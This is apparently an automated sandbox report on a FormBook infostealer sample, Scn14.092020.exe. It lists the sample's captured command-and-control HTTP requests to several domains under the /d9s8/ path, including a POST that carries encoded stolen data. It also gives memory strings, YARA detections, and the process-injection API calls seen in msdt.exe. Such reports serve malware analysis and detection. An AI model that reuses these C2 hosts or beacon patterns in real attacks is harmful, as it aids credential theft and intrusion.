          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=rlkmmCaXt+AMyrw/MBwq/BSknyHni0kPKYXwYo5rBrAjCFj+y3ydrJyfUTRA3QRnBG+G&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.krewebijoux.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=6KwpPXUiwFX7ZBA9OodNm3YLSATd2KUq4kH3sDUsuv0xVz64ikFWE+1HwWsjSUW/OVbp HTTP/1.1Host: www.environmentsafetymemphis.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA90d4Z59dcBU3&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.nittayabeauty.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?2de=Rzu4ZZ-XVT&vP=2xxhDTKogYVwMqkKCpG9QsOba3/Ca+nzIrlpYJOr5IqlgQrpv0G7wV/gFSfl3ZRuG6Nl HTTP/1.1Host: www.ashleygrady.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /d9s8/?vP=yQsfb6F+aE13Jx6qI3j1CMlHibkP501s7Hi6bb3WKNeqcCrzTo1bPmy/qOyDoR5/Ss4I&2de=Rzu4ZZ-XVT HTTP/1.1Host: www.aktivasi-asuransi-bukalapak.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.nola3d.com
          Source: unknownHTTP traffic detected: POST /d9s8/ HTTP/1.1Host: www.keebcat.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.keebcat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.keebcat.com/d9s8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 76 50 3d 54 4d 41 68 30 41 6f 5f 46 75 46 5a 46 70 59 77 42 63 76 61 57 4b 65 46 6c 59 4a 53 53 30 79 42 4d 71 70 56 28 6a 38 47 65 4c 76 77 4f 6f 5a 56 43 56 76 34 73 38 64 48 7e 71 50 44 39 71 57 47 4e 31 56 45 73 77 54 4b 37 57 6a 37 46 36 7a 67 42 5f 56 73 6a 73 6b 5f 31 62 44 74 34 45 74 45 4b 42 4f 5a 54 38 5a 30 47 62 31 6f 4e 34 69 6d 78 32 76 36 66 58 33 38 67 57 75 4c 47 33 44 4c 6b 42 56 50 34 5f 78 61 46 30 31 59 6f 58 45 34 66 77 28 52 43 50 46 45 32 32 38 53 6a 2d 41 41 49 33 35 65 4a 71 69 51 73 50 32 6d 4e 47 42 44 71 4d 7e 58 56 64 59 43 47 47 69 69 54 57 44 4c 67 5a 31 55 4c 62 67 71 78 6a 43 6f 7e 73 48 58 6a 57 66 62 39 4e 78 4c 78 70 38 76 73 6a 77 4a 49 49 66 6f 48 34 72 38 48 4b 46 74 55 6e 31 5f 59 30 6f 4e 37 6c 4b 41 70 47 70 48 4e 70 4c 6d 7e 41 6d 32 36 39 6c 76 32 67 34 74 70 39 6e 39 36 32 70 70 63 66 48 47 45 72 4c 4e 6e 65 74 54 6e 63 53 35 68 4a 48 66 76 73 57 6d 36 46 68 67 61 54 4b 44 59 6b 7a 47 70 62 71 30 7e 31 6f 59 57 7a 6d 6b 48 65 30 56 6c 6d 76 69 59 52 47 57 62 2d 43 4e 66 43 6e 49 70 70 28 4b 55 31 64 43 59 6e 34 34 4c 53 50 5a 74 6a 66 6d 4b 77 50 44 49 42 67 74 6e 73 34 6c 47 6d 43 38 4d 32 7a 4f 66 4d 64 4a 78 74 4e 67 38 65 74 55 74 74 73 31 75 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: vP=TMAh0Ao_FuFZFpYwBcvaWKeFlYJSS0yBMqpV(j8GeLvwOoZVCVv4s8dH~qPD9qWGN1VEswTK7Wj7F6zgB_Vsjsk_1bDt4EtEKBOZT8Z0Gb1oN4imx2v6fX38gWuLG3DLkBVP4_xaF01YoXE4fw(RCPFE228Sj-AAI35eJqiQsP2mNGBDqM~XVdYCGGiiTWDLgZ1ULbgqxjCo~sHXjWfb9NxLxp8vsjwJIIfoH4r8HKFtUn1_Y0oN7lKApGpHNpLm~Am269lv2g4tp9n962ppcfHGErLNnetTncS5hJHfvsWm6FhgaTKDYkzGpbq0~1oYWzmkHe0VlmviYRGWb-CNfCnIpp(KU1dCYn44LSPZtjfmKwPDIBgtns4lGmC8M2zOfMdJxtNg8etUtts1uw).
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 14 Sep 2020 14:48:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
          Source: Scn14.092020.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: Scn14.092020.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
          Source: explorer.exe, 00000002.00000000.401753185.000000000E24F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: Scn14.092020.exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
          Source: Scn14.092020.exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
          Source: Scn14.092020.exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Scn14.092020.exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/kwbg.jpg)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i1.cdn-image.com/__media__/pics/12471/libg.png)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/12471/bodybg.png)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefix
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-b
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.ttf
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woff2
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eot?#iefix
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.otf
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-r
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.2
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/arrow.png)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/libgh.png)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/logo.png)
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://i4.cdn-image.com/__media__/pics/12471/search-icon.png)
          Source: Scn14.092020.exeString found in binary or memory: http://ocsp.digicert.com0C
          Source: Scn14.092020.exeString found in binary or memory: http://ocsp.digicert.com0O
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://winp112727.myorderbox.com/linkhandler/servlet/RenewDomainServlet?validatenow=false&amp;orderi
          Source: explorer.exe, 00000002.00000002.640672802.0000000002280000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.397117506.0000000007CC8000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Dental_Plans.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjjk%2Fb8
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Free_Credit_Report.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjj
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Health_Insurance.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjjk%
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Healthy_Weight_Loss.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIj
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/Top_Smart_Phones.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjjk%
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/d9s8/?vP=kyZTX99LiW/icy84gI8HitXVOdgKxOvA9fmCXsGAN7TtQxOyGGUpuanA90d4Z5
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/display.cfm
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/fashion_trends.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjjk%2F
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/music_videos.cfm?fp=Q7iQpe6GNwnMOS1htDQTVXINOcIWNsnSVF4GJ4qReeIjjk%2Fb8
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/px.js?ch=1
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/px.js?ch=2
          Source: msdt.exe, 00000006.00000002.644284797.0000000004E4D000.00000004.00000001.sdmpString found in binary or memory: http://www.nittayabeauty.com/sk-logabpstatus.php?a=WU4yUk9HM1hMREJoMllPUmRWNzNIQ0pUZ1kxeDdIamU2TFNpZ
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.400294663.000000000C236000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf##
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmp, msdt.exe, 00000006.00000002.640379213.0000000000427000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: msdt.exe, 00000006.00000002.640362214.0000000000420000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033m
          Source: msdt.exe, 00000006.00000002.641165269.0000000002C38000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken&display=windesktop&theme=win7&lc=1033&redirect_uri=htt
          Source: msdt.exe, 00000006.00000002.640379213.0000000000427000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfken77
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033B
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmp, msdt.exe, 00000006.00000002.640379213.0000000000427000.00000004.00000020.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: msdt.exe, 00000006.00000003.489167785.0000000000452000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: Scn14.092020.exeString found in binary or memory: https://www.digicert.com/CPS0
          Source: Scn14.092020.exe, 00000000.00000002.378140538.0000000000A6A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.417553515.0000000001650000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.416986995.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.379837201.0000000003801000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.640284726.0000000000360000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.379943947.00000000038B2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.417610819.0000000001680000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.641188010.0000000002C70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Scn14.092020.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.Scn14.092020.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417930 NtCreateFile,1_2_00417930
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004179E0 NtReadFile,1_2_004179E0
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417A60 NtClose,1_2_00417A60
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417B10 NtAllocateVirtualMemory,1_2_00417B10
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_004179DA NtReadFile,1_2_004179DA
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417987 NtReadFile,1_2_00417987
          Source: C:\Users\user\Desktop\Scn14.092020.exeCode function: 1_2_00417B0A NtAllocateVirtualMemory,1_2_00417B0A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609540 NtReadFile,LdrInitializeThunk,6_2_04609540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046095D0 NtClose,LdrInitializeThunk,6_2_046095D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609660 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_04609660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609650 NtQueryValueKey,LdrInitializeThunk,6_2_04609650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609610 NtEnumerateValueKey,LdrInitializeThunk,6_2_04609610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046096E0 NtFreeVirtualMemory,LdrInitializeThunk,6_2_046096E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046096D0 NtCreateKey,LdrInitializeThunk,6_2_046096D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609710 NtQueryInformationToken,LdrInitializeThunk,6_2_04609710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609FE0 NtCreateMutant,LdrInitializeThunk,6_2_04609FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609780 NtMapViewOfSection,LdrInitializeThunk,6_2_04609780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609860 NtQuerySystemInformation,LdrInitializeThunk,6_2_04609860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609840 NtDelayExecution,LdrInitializeThunk,6_2_04609840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609910 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_04609910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046099A0 NtCreateSection,LdrInitializeThunk,6_2_046099A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609A50 NtCreateFile,LdrInitializeThunk,6_2_04609A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609B00 NtSetValueKey,LdrInitializeThunk,6_2_04609B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609560 NtWriteFile,6_2_04609560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609520 NtWaitForSingleObject,6_2_04609520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0460AD30 NtSetContextThread,6_2_0460AD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046095F0 NtQueryInformationFile,6_2_046095F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609670 NtQueryInformationProcess,6_2_04609670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609760 NtOpenProcess,6_2_04609760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0460A770 NtOpenThread,6_2_0460A770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609770 NtSetInformationFile,6_2_04609770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609730 NtQueryVirtualMemory,6_2_04609730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0460A710 NtOpenProcessToken,6_2_0460A710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046097A0 NtUnmapViewOfSection,6_2_046097A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_0460B040 NtSuspendThread,6_2_0460B040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609820 NtEnumerateKey,6_2_04609820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046098F0 NtReadVirtualMemory,6_2_046098F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046098A0 NtWriteVirtualMemory,6_2_046098A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609950 NtQueueApcThread,6_2_04609950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_046099D0 NtCreateProcessEx,6_2_046099D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609A20 NtResumeThread,6_2_04609A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609A00 NtProtectVirtualMemory,6_2_04609A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 6_2_04609A10 NtQuerySection,6_2_04609A10
